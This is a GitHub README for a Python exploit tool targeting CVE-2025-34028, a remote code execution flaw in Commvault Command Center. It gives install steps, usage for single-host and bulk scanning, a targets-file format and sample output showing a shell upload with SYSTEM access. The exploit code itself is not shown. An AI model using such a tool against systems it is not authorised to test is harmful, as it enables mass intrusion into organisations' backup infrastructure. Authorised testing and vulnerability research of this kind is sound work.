Skip to content

README.md

Latest commit

 

History

History
99 lines (81 loc) · 2.91 KB

README.md

File metadata and controls

99 lines (81 loc) · 2.91 KB

CVE-2025-34028 - Commvault Command Center Remote Code Execution

Python License Vulnerability

A Python exploit for CVE-2025-34028, a remote code execution vulnerability in Commvault Command Center. This tool allows testing single targets or scanning multiple hosts in bulk.

Features

  • Single target or bulk scanning capability
  • Automatic Commvault instance verification
  • Detailed output with system user information
  • Random path generation for each execution
  • Clean summary table of vulnerable hosts
  • Comprehensive error handling

Installation

git clone https://github.com/Mattb709/CVE-2025-34028-Commvault
cd CVE-2025-34028-Commvault
pip install -r requirements.txt

Requirements

  • Python 3.6+
  • Required packages:
    • requests
    • tabulate

Install requirements with:

pip install requests tabulate

Usage

usage: CVE-2025-34028-Commvault.py [-h] (-t TARGET | -f TARGETS_FILE)

CVE-2025-34028 Commvault RCE Exploit

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Single target URL (e.g., https://192.168.1.100:8000)
  -f TARGETS_FILE, --file TARGETS_FILE
                        File containing multiple targets, one per line

Examples

Test a single target:

python CVE-2025-34028-Commvault.py -t https://commvault.example.com:8000

Scan multiple targets from a file:

python CVE-2025-34028-Commvault.py -f targets.txt

Target File Format

The targets file should contain one target per line in the format:

https://host:port
http://ip

Example targets.txt:

https://cv.company.com:8000
http://192.168.1.100
https://10.10.10.5:443

Output

The script provides:

  • Real-time progress with status for each target
  • Detailed output for vulnerable hosts
  • Summary table of all tested hosts
  • Clear identification of successful exploitations

Sample output:

CVE-2025-34028 Commvault RCE PoC

[1] Processing target: https://cvtest.example.com:8000
[1] [+] Valid Commvault instance detected
[1] [+] Shell uploaded successfully
[1] [+] System User: NT AUTHORITY\SYSTEM

[+] Results Summary
+---------+------------------------------+---------------------+------------------+
| Index   | URL                          | Status              | System User      |
+---------+------------------------------+---------------------+------------------+
| 1       | https://cvtest.example.com:8000 | RCE Successful      | NT AUTHORITY\SYSTEM |
+---------+------------------------------+---------------------+------------------+

Disclaimer

This tool is for educational and authorized testing purposes only. The author is not responsible for any misuse or damage caused by this program.

License

MIT License - See LICENSE file for details